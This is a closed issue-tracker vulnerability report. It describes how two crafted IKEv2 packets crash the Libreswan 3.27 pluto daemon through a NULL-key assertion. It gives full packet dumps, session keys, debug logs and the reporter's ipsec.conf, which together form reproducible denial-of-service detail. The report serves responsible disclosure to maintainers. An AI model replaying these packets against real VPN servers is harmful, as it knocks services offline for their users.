Closed
Description
Hello, I triggered a vulnerability while testing the Libreswan 3.27 IKEv2 server.
Sending two IKEv2 packets (init_IKE and delete_IKE, in 3des_cbc mode) to the Libreswan server makes the pluto IKE daemon restart, due to a NULL pointer dereference when built with NSS.
The detailed exchange is as follows:
First, the client sends the first init_IKE message to the server.
The server replies to the client with its own init_IKE message.
Then the client sends an encrypted delete_IKE message to the server.
The server tries to respond to the client with INVALID_IKE_SPI, but pluto aborts while preparing to encrypt the message: the log below shows a failed assertion in ike_alg_nss_cbc() because the NSS-derived encryption key is NULL, with state #1 still in PARENT_R1.
#### detailed packets
# The first packet(I: init_IKE)
###[ IP ]###
version = 4
ihl = 5
tos = 0x0
len = 416
id = 1
flags =
frag = 0
ttl = 64
proto = udp
chksum = 0xa778
src = 192.168.40.1
dst = 192.168.40.130
\options \
###[ UDP ]###
sport = isakmp
dport = isakmp
len = 396
chksum = 0x3708
###[ IKEv2 ]###
init_SPI = '4\xba;\xf6\xd8\x8c\x17\xef'
resp_SPI = ''
next_payload= SA
version = 0x20
exch_type = IKE_SA_INIT
flags = Initiator
id = 0
length = 388
###[ IKEv2 SA ]###
next_payload= KE
res = 0
length = 44
\prop \
|###[ IKEv2 Proposal ]###
| next_payload= last
| res = 0
| length = 40
| proposal = 1
| proto = IKEv2
| SPIsize = 0
| trans_nb = 4
| SPI = ''
| \trans \
| |###[ IKE Transform ]###
| | next_payload= Transform
| | res = 0
| | length = 8
| | transform_type= Encryption
| | res2 = 0
| | transform_id= 3DES
| |###[ IKE Transform ]###
| | next_payload= Transform
| | res = 0
| | length = 8
| | transform_type= Integrity
| | res2 = 0
| | transform_id= HMAC-SHA1-96
| |###[ IKE Transform ]###
| | next_payload= Transform
| | res = 0
| | length = 8
| | transform_type= PRF
| | res2 = 0
| | transform_id= PRF_HMAC_SHA1
| |###[ IKE Transform ]###
| | next_payload= last
| | res = 0
| | length = 8
| | transform_type= GroupDesc
| | res2 = 0
| | transform_id= 1024MODPgr
###[ IKEv2 Key Exchange ]###
next_payload= Nonce
res = 0
length = 136
group = 1024MODPgr
res2 = 0
load = '(\xe9\xaa\xaa\x91\xf1\x1d)\xd9\x1c\x9c\xeb\xcab\x90\xd8\x8fZ\x19\xad\x15\x80\xfe\x16\xde\x06j\x93\t\x92\xcay\x0f^}\x16\x11\xdc\xab\xd3\x0f\xf6ciA\xfe\t\x8del\xd4D\x04\x00\x87v\\Q\xa7\x83t\xc4u\x18\xe6\xb1\xdcV\xbb\x00u}?\x8dz\x90\xef\xe9gb\xf3uJr\x8ed\xae\xcf:\x85\xe5\xdf\xda\xdc1\xc3\x95K\x8e\x82\x84\x96\x0b\xea_N\xe5\x8bB\xdf\x9c\\\xa4\x1a\xbd\xf4B\x07\x1a\x0c\xfd)\xb9.4y\x1d\xa1'
###[ IKEv2 Nonce ]###
next_payload= Notify
res = 0
length = 36
load = '\x9al/\xbe\x01\x1f\xdc\xdc\x8b\xa4O\xd7k\xdf\x96^9\xcbmx\xcf\xe8\xc4\xa4$x\x8a\r\xbb%\xa6\xb2'
###[ IKEv2 Notify ]###
next_payload= Notify
res = 0
length = 28
proto = Reserved
SPIsize = 0
type = NAT_DETECTION_SOURCE_IP
SPI = ''
load = '\x13\xfa\x01\xe7<\xe4\x93T\xb6\xec\x88\x1d\xeaS\x13O\xad2\x86 '
###[ IKEv2 Notify ]###
next_payload= VendorID
res = 0
length = 28
proto = Reserved
SPIsize = 0
type = NAT_DETECTION_DESTINATION_IP
SPI = ''
load = '\xde\xb7\xf8\x91\xddX(\xe6\x89\xc3\xc1l\xae\x9a\x07\xb8o\xb4\x13\xc3'
###[ IKEv2 Vendor ID ]###
next_payload= VendorID
res = 0
length = 24
vendorID = '\x1e+Qi\x05\x99\x1c}|\x96\xfc\xbf\xb5\x87\xe4a\x00\x00\x00\t'
###[ IKEv2 Vendor ID ]###
next_payload= VendorID
res = 0
length = 20
vendorID = '\xfb\x1d\xe3\xcd\xf3A\xb7\xea\x16\xb7\xe5\xbe\x08U\xf1 '
###[ IKEv2 Vendor ID ]###
next_payload= VendorID
res = 0
length = 20
vendorID = '&$M8\xed\xdba\xb3\x17*6\xe3\xd0\xcf\xb8\x19'
###[ IKEv2 Vendor ID ]###
next_payload= None
res = 0
length = 24
vendorID = '\x01R\x8b\xbb\xc0\x06\x96\x12\x18I\xab\x9a\x1c[*Q\x00\x00\x00\x02'
# The second packet(R: init_IKE)
###[ IP ]###
version = 4
ihl = 5
tos = 0x0
len = 361
id = 31815
flags = DF
frag = 0
ttl = 64
proto = udp
chksum = 0xeb68
src = 192.168.40.130
dst = 192.168.40.1
\options \
###[ UDP ]###
sport = isakmp
dport = isakmp
len = 341
chksum = 0xd236
###[ IKEv2 ]###
init_SPI = '4\xba;\xf6\xd8\x8c\x17\xef'
resp_SPI = '\xc6\xe1\x11i\x1d^\x18D'
next_payload= SA
version = 0x20
exch_type = IKE_SA_INIT
flags = Response
id = 0
length = 333
###[ IKEv2 SA ]###
next_payload= KE
res = 0
length = 44
\prop \
|###[ IKEv2 Proposal ]###
| next_payload= last
| res = 0
| length = 40
| proposal = 1
| proto = IKEv2
| SPIsize = 0
| trans_nb = 4
| SPI = ''
| \trans \
| |###[ IKE Transform ]###
| | next_payload= Transform
| | res = 0
| | length = 8
| | transform_type= Encryption
| | res2 = 0
| | transform_id= 3DES
| |###[ IKE Transform ]###
| | next_payload= Transform
| | res = 0
| | length = 8
| | transform_type= PRF
| | res2 = 0
| | transform_id= PRF_HMAC_SHA1
| |###[ IKE Transform ]###
| | next_payload= Transform
| | res = 0
| | length = 8
| | transform_type= Integrity
| | res2 = 0
| | transform_id= HMAC-SHA1-96
| |###[ IKE Transform ]###
| | next_payload= last
| | res = 0
| | length = 8
| | transform_type= GroupDesc
| | res2 = 0
| | transform_id= 1024MODPgr
###[ IKEv2 Key Exchange ]###
next_payload= Nonce
res = 0
length = 136
group = 1024MODPgr
res2 = 0
load = '\x7f\x9b\x1aHlx\xdd\x86\xaa\xcf\x8e\xcd\x14\x9dU\x1e\x9c\x96\x99\xe6\x16\xc6\xce\xc8.&\xe5\x0e\x16\x8cfr\xfc\x8c\xc60\x83k\x8dF\x1a\xd5s\x8a^\xa5\x85\xcd\x86-\xde\x97\x98\xedc\x17\xb8\xf84!\x15\xf0\x11(D?\xd9\xa3\xc2\x80\xd6\xd6\x92R\xe2\t\xcb\xa2D{\x13g\xb7\x99\xa4\xa7\xd4\x8b\x0c\xf7\xb8\xbd\xa0]\x87\xd0\xa1\xa6~Nf\x9d\x98\x9f\x89\x94\xe5V\xed%\x0f&\x8cT\xe6\xa0\x05Uuyk\xe1w\xd82]A\xfa'
###[ IKEv2 Nonce ]###
next_payload= Notify
res = 0
length = 36
load = '\xe9\xc3c\x8a\xa7\xa9_\x8d\xf3\x15\xbc7\xaa\xd8\x8b\xd4\x93\x16\xb7\x10\xe0w\xc0\x10IY\xc1s\xf2<+k'
###[ IKEv2 Notify ]###
next_payload= Notify
res = 0
length = 8
proto = Reserved
SPIsize = 0
type = IKEV2_FRAGMENTATION_SUPPORTED
SPI = ''
load = ''
###[ IKEv2 Notify ]###
next_payload= Notify
res = 0
length = 28
proto = Reserved
SPIsize = 0
type = NAT_DETECTION_SOURCE_IP
SPI = ''
load = 's\x9a\xd1\xecQ\xc4L\xdfy^\xa5\xb9\x9b\xa4\r\xde\x0c\x13;\xdc'
###[ IKEv2 Notify ]###
next_payload= CERTREQ
res = 0
length = 28
proto = Reserved
SPIsize = 0
type = NAT_DETECTION_DESTINATION_IP
SPI = ''
load = "\x91\n%J\x85\xb0\xec\xads\xf42\x8b1\x98\x7f\xff'\xcb\xa6\xfe"
###[ IKEv2 Payload ]###
next_payload= None
flags =
length = 25
load = '\x04\xa40\xb5\xee\xedr\x07\xa7\xbf\xe1L<]\x95\x19\xde\xeeys\xd9'
# The third packet(I: delete_IKE)
###[ IP ]###
version = 4
ihl = 5
tos = 0x0
len = 100
id = 1
flags =
frag = 0
ttl = 64
proto = udp
chksum = 0xa8b4
src = 192.168.40.1
dst = 192.168.40.130
\options \
###[ UDP ]###
sport = 4500
dport = 4500
len = 80
chksum = 0xafe4
data = 0x00000000
###[ IKEv2 ]###
init_SPI = '4\xba;\xf6\xd8\x8c\x17\xef'
resp_SPI = '\xc6\xe1\x11i\x1d^\x18D'
next_payload= Encrypted
version = 0x20
exch_type = INFORMATIONAL
flags = Initiator
id = 1
length = 68
###[ IKEv2 Encrypted and Authenticated ]###
next_payload= Delete
res = 0
length = 40
load = '=!\x87\x9c@\x0eX\xe5\xa1\xdf\xc6\xc9\xa2&\xf8\xf5\xc7\x0fSu\xd7\xa0\xdf\xc4nZ\x1a\x99U\x02Y_\xad\xc5UA'
# *************** #
# Decrypted message
###[ IKEv2 Delete ]###
next_payload= None
res = 0
length = 8
vendorID = '\x01\x00\x00\x00'
# *************** #
# relevant parameters (SPIs and SK_a*/SK_e* keys of this test session)
spi_i
0x34\0xba\0x3b\0xf6\0xd8\0x8c\0x17\0xef
spi_r
0xc6\0xe1\0x11\0x69\0x1d\0x5e\0x18\0x44
sk_ai
0xa7\0xcb\0x4f\0x50\0xe9\0xb5\0x61\0x8f\0x04\0xc4\0xaa\0x0f\0x58\0x93\0x98\0xd3\0xfd\0xb6\0xdb\0xdb
sk_ar
0x89\0x2c\0xd0\0x3a\0x4e\0xb1\0xeb\0x19\0xf7\0x04\0xc1\0xc1\0x6f\0x64\0x08\0x5d\0x4b\0xef\0x8d\0x34
sk_ei
0xe9\0x4a\0x94\0x4d\0x2e\0xfb\0x8b\0x8e\0x86\0xb9\0xd6\0x18\0xfb\0xcd\0x53\0xdd\0xd8\0x35\0x60\0xba\0xc8\0xbb\0x71\0x46
sk_er
0x7a\0x4d\0x3d\0xb3\0x4d\0x72\0x7e\0x25\0xa4\0xc5\0x4a\0xb1\0x93\0x9d\0x9f\0x51\0x17\0x44\0x86\0x3e\0x51\0xe0\0x39\0x22
Relevant log
May 7 16:32:32.868480: | state #1 requesting EVENT_CRYPTO_TIMEOUT to be deleted
May 7 16:32:32.868496: | free_event_entry: release EVENT_CRYPTO_TIMEOUT-pe@0x55f4dc4630f8
May 7 16:32:32.868501: | event_schedule: new EVENT_v2_RESPONDER_TIMEOUT-pe@0x55f4dc4630f8
May 7 16:32:32.868506: | inserting event EVENT_v2_RESPONDER_TIMEOUT, timeout in 200.000 seconds for #1
May 7 16:32:32.868515: | processing: stop state #1 connection "ikev2-cp"[1] 192.168.40.1 192.168.40.1:500 (in schedule_event_now_cb() at server.c:561)
May 7 16:32:32.868519: | serialno table: hash serialno #0 to head 0x55f4db2fb4e0
May 7 16:32:32.868522: | serialno table: hash serialno #0 to head 0x55f4db2fb4e0
May 7 16:32:32.883707: | *received 68 bytes from 192.168.40.1:4500 on ens33 (port=4500)
May 7 16:32:32.883740: | 34 ba 3b f6 d8 8c 17 ef c6 e1 11 69 1d 5e 18 44
May 7 16:32:32.883743: | 2e 20 25 08 00 00 00 01 00 00 00 44 2a 00 00 28
May 7 16:32:32.883745: | 3d 21 87 9c 40 0e 58 e5 a1 df c6 c9 a2 26 f8 f5
May 7 16:32:32.883766: | c7 0f 53 75 d7 a0 df c4 6e 5a 1a 99 55 02 59 5f
May 7 16:32:32.883769: | ad c5 55 41
May 7 16:32:32.883773: | processing: start from 192.168.40.1:4500 (in process_md() at demux.c:391)
May 7 16:32:32.883778: | **parse ISAKMP Message:
May 7 16:32:32.883780: | initiator cookie:
May 7 16:32:32.883782: | 34 ba 3b f6 d8 8c 17 ef
May 7 16:32:32.883785: | responder cookie:
May 7 16:32:32.883786: | c6 e1 11 69 1d 5e 18 44
May 7 16:32:32.883789: | next payload type: ISAKMP_NEXT_v2SK (0x2e)
May 7 16:32:32.883792: | ISAKMP version: IKEv2 version 2.0 (rfc4306/rfc5996) (0x20)
May 7 16:32:32.883794: | exchange type: ISAKMP_v2_INFORMATIONAL (0x25)
May 7 16:32:32.883796: | flags: ISAKMP_FLAG_v2_IKE_INIT (0x8)
May 7 16:32:32.883799: | message ID: 00 00 00 01
May 7 16:32:32.883801: | length: 68 (0x44)
May 7 16:32:32.883804: | processing version=2.0 packet with exchange type=ISAKMP_v2_INFORMATIONAL (37)
May 7 16:32:32.883806: | I am receiving an IKEv2 Request ISAKMP_v2_INFORMATIONAL
May 7 16:32:32.883808: | I am the IKE SA Original Responder
May 7 16:32:32.883814: | cookies table: hash icookie 34 ba 3b f6 d8 8c 17 ef rcookie c6 e1 11 69 1d 5e 18 44 to 3873113480610546027 slot 0x55f4db2f6b40
May 7 16:32:32.883817: | parent v2 peer and cookies match on #1
May 7 16:32:32.883820: | v2 state object #1 found, in STATE_PARENT_R1
May 7 16:32:32.883825: | processing: start state #1 connection "ikev2-cp"[1] 192.168.40.1 192.168.40.1:500 (in processed_retransmit() at ikev2.c:1182)
May 7 16:32:32.883827: | found state #1
May 7 16:32:32.883831: | processing: [RE]START state #1 connection "ikev2-cp"[1] 192.168.40.1 192.168.40.1:500 (in ikev2_process_packet() at ikev2.c:1552)
May 7 16:32:32.883834: | processing: start connection "ikev2-cp"[1] 192.168.40.1 (BACKGROUND) (in ikev2_process_packet() at ikev2.c:1557)
May 7 16:32:32.883837: | #1 is idle
May 7 16:32:32.883839: | #1 idle
May 7 16:32:32.883841: | #1 in state PARENT_R1: received v2I1, sent v2R1
May 7 16:32:32.883844: | selected state microcode roof
May 7 16:32:32.883846: | no useful state microcode entry found
May 7 16:32:32.883850: "ikev2-cp"[1] 192.168.40.1 #1: responding to INFORMATIONAL message (ID 1) from 192.168.40.1:500 with encrypted notification INVALID_IKE_SPI
May 7 16:32:32.883853: | Opening output PBS encrypted notification
May 7 16:32:32.883856: | **emit ISAKMP Message:
May 7 16:32:32.883858: | initiator cookie:
May 7 16:32:32.883860: | 34 ba 3b f6 d8 8c 17 ef
May 7 16:32:32.883862: | responder cookie:
May 7 16:32:32.883864: | c6 e1 11 69 1d 5e 18 44
May 7 16:32:32.883866: | next payload type: ISAKMP_NEXT_NONE (0x0)
May 7 16:32:32.883869: | ISAKMP version: IKEv2 version 2.0 (rfc4306/rfc5996) (0x20)
May 7 16:32:32.883871: | exchange type: ISAKMP_v2_INFORMATIONAL (0x25)
May 7 16:32:32.883873: | flags: ISAKMP_FLAG_v2_MSG_RESPONSE (0x20)
May 7 16:32:32.883875: | message ID: 00 00 00 01
May 7 16:32:32.883878: | next payload type: saving message location 'ISAKMP Message'.'next payload type'
May 7 16:32:32.883881: | next payload type: setting 'ISAKMP Message'.'next payload type' to IKEv2 Encryption Payload (46:ISAKMP_NEXT_v2SK)
May 7 16:32:32.883884: | ***emit IKEv2 Encryption Payload:
May 7 16:32:32.883886: | next payload type: ISAKMP_NEXT_v2NONE (0x0)
May 7 16:32:32.883888: | flags: none (0x0)
May 7 16:32:32.883890: | next payload type: saving message location 'IKEv2 Encryption Payload'.'next payload type'
May 7 16:32:32.883901: | emitting 8 raw bytes of IV into IKEv2 Encryption Payload
May 7 16:32:32.883904: | IV d1 f5 3d d9 f2 04 95 d2
May 7 16:32:32.883906: | Adding a v2N Payload
May 7 16:32:32.883909: | next payload type: setting 'IKEv2 Encryption Payload'.'next payload type' to IKEv2 Notify Payload (41:ISAKMP_NEXT_v2N)
May 7 16:32:32.883911: | ****emit IKEv2 Notify Payload:
May 7 16:32:32.883913: | next payload type: ISAKMP_NEXT_v2NONE (0x0)
May 7 16:32:32.883915: | flags: none (0x0)
May 7 16:32:32.883918: | Protocol ID: PROTO_v2_RESERVED (0x0)
May 7 16:32:32.883926: | SPI size: 0 (0x0)
May 7 16:32:32.883929: | Notify Message Type: v2N_INVALID_IKE_SPI (0x4)
May 7 16:32:32.883931: | next payload type: saving payload location 'IKEv2 Notify Payload'.'next payload type'
May 7 16:32:32.883944: | emitting length of IKEv2 Notify Payload: 8
May 7 16:32:32.883947: | adding 8 bytes of padding (including 1 byte padding-length)
May 7 16:32:32.883949: | emitting 8 raw bytes of padding and length into IKEv2 Encryption Payload
May 7 16:32:32.883952: | padding and length 00 01 02 03 04 05 06 07
May 7 16:32:32.883955: | emitting 12 zero bytes of length of truncated HMAC/KEY into IKEv2 Encryption Payload
May 7 16:32:32.883966: | emitting length of IKEv2 Encryption Payload: 40
May 7 16:32:32.883969: | emitting length of ISAKMP Message: 68
May 7 16:32:32.883972: | construct_enc_iv: encryption IV/starting-variable: salt-size=0 wire-IV-size=8 block-size 8
May 7 16:32:32.883974: | construct_enc_iv: encryption IV/starting-variable: computed counter-size=0
May 7 16:32:32.883976: | encryption IV/starting-variable
May 7 16:32:32.883978: | d1 f5 3d d9 f2 04 95 d2
May 7 16:32:32.883980: | data before encryption:
May 7 16:32:32.883982: | 00 00 00 08 00 00 00 04 00 01 02 03 04 05 06 07
May 7 16:32:32.883985: | NSS ike_alg_nss_cbc: 3des_cbc - enter
May 7 16:32:32.883988: "ikev2-cp"[1] 192.168.40.1 #1: ABORT: ASSERTION FAILED: 3des_cbc - NSS derived enc key in NULL (in ike_alg_nss_cbc() at ike_alg_encrypt_nss_cbc_ops.c:41)
My ipsec.conf
# Libreswan ipsec.conf as pasted by the reporter. Section bodies appear here
# without indentation (presumably lost in the paste).
version 2.0
# Global pluto settings.
config setup
# Address ranges accepted as virtual-private subnets; the two "!" entries
# (192.168.42.0/24 and 192.168.43.0/24) are exclusions.
virtual-private=%v4:10.0.0.0/8,%v4:192.168.0.0/16,%v4:172.16.0.0/12,%v4:!192.168.42.0/24,%v4:!192.168.43.0/24
protostack=netkey
interfaces=%defaultroute
uniqueids=no
# Debug logging including crypto detail. The log excerpt in this report shows
# the IV and the plaintext "data before encryption" being written out, so a
# log produced with this setting should be handled as sensitive and the
# setting turned off outside of debugging.
plutodebug="all crypt"
# Log destination; presumably the file the "Relevant log" excerpt was taken from.
plutostderrlog=/var/log/libreswan.log
# Connection that handles the exchange in this report (the log names it
# "ikev2-cp"[1]): IKEv2 only, certificate authentication on both sides,
# address pool handed out to clients.
conn ikev2-cp
left=%defaultroute
leftcert=192.168.40.130
leftid=@192.168.40.130
leftsendcert=always
leftsubnet=0.0.0.0/0
leftrsasigkey=%cert
# Peers are not restricted by source address. In the log the state is still
# PARENT_R1 when the abort happens, i.e. the peer has not authenticated yet.
right=%any
rightid=%fromcert
# rightaddresspool=192.168.43.10-192.168.43.250
rightaddresspool=10.31.2.0-10.31.3.254
rightca=%same
rightrsasigkey=%cert
narrowing=yes
dpddelay=30
dpdtimeout=120
dpdaction=clear
auto=add
# Only IKEv2 is accepted on this connection.
ikev2=insist
rekey=yes
pfs=no
ike-frag=yes
# The first proposal, 3des-sha1;modp1024, matches the transforms negotiated in
# the packets of this report (3DES, HMAC-SHA1-96, PRF_HMAC_SHA1, 1024MODPgr).
# 3DES, SHA-1 and MODP-1024 are legacy algorithms; the aes*-sha2 entries are
# the stronger choices in this list.
ike=3des-sha1;modp1024,aes256-sha2,aes128-sha2,aes256-sha1,aes128-sha1,aes256-sha2;modp1024,aes128-sha1;modp1024
# Child SA proposals; the same legacy 3des-sha1;modp1024 entry is listed first.
phase2alg=3des-sha1;modp1024,aes_gcm-null,aes128-sha1,aes256-sha1,aes128-sha2,aes256-sha2
# DNS servers pushed to clients.
modecfgdns="8.8.8.8 8.8.4.4"
# Forces UDP encapsulation; NOTE(review): this is probably why the third
# packet in the report is addressed to port 4500 - confirm.
encapsulation=yes
mobike=no
# Template section: it has no auto= line of its own and is pulled in through
# "also=shared" by the l2tp-psk and xauth-psk connections below.
conn shared
left=%defaultroute
leftid=218.28.144.36
# Peers are not restricted by source address.
right=%any
encapsulation=yes
# Pre-shared-key authentication.
authby=secret
pfs=no
rekey=no
keyingtries=5
dpddelay=30
dpdtimeout=120
dpdaction=clear
# No 3DES here, but SHA-1 and MODP-1024 proposals are still offered.
ike=aes256-sha2,aes128-sha2,aes256-sha1,aes128-sha1,aes256-sha2;modp1024,aes128-sha1;modp1024
phase2alg=aes_gcm-null,aes128-sha1,aes256-sha1,aes256-sha2_512,aes128-sha2,aes256-sha2
# NOTE(review): interop workaround that uses the non-standard 96-bit
# truncation of HMAC-SHA2-256 for older peers - confirm it is still needed.
sha2-truncbug=yes
# L2TP/IPsec connection: transport-mode ESP protecting UDP port 1701,
# with the remaining settings inherited from "conn shared".
conn l2tp-psk
auto=add
# Protocol 17 (UDP), port 1701 on the local side; any port on the peer side.
leftprotoport=17/1701
rightprotoport=17/%any
type=transport
phase2=esp
also=shared
# IKEv1-only XAUTH connection with mode-config; PSK and the other base
# settings come from "conn shared". Not the connection exercised in this
# report, which uses IKEv2.
conn xauth-psk
auto=add
leftsubnet=0.0.0.0/0
rightaddresspool=192.168.43.10-192.168.43.250
# DNS servers pushed to clients.
modecfgdns="8.8.8.8 8.8.4.4"
leftxauthserver=yes
rightxauthclient=yes
leftmodecfgserver=yes
rightmodecfgclient=yes
modecfgpull=yes
# XAUTH credentials are checked against a local file rather than PAM.
xauthby=file
ike-frag=yes
# IKEv2 is refused on this connection.
ikev2=never
cisco-unity=yes
also=shared
# Overrides the ike= list from "conn shared" and puts the legacy
# 3des-sha1;modp1024 proposal first.
ike=3des-sha1;modp1024,aes256-sha2,aes128-sha2,aes256-sha1,aes128-sha1,aes256-sha2;modp1024,aes128-sha1;modp1024
phase2alg=aes_gcm-null,aes128-sha1,aes256-sha1,aes128-sha2,aes256-sha2
Looking forward to your reply, thank you.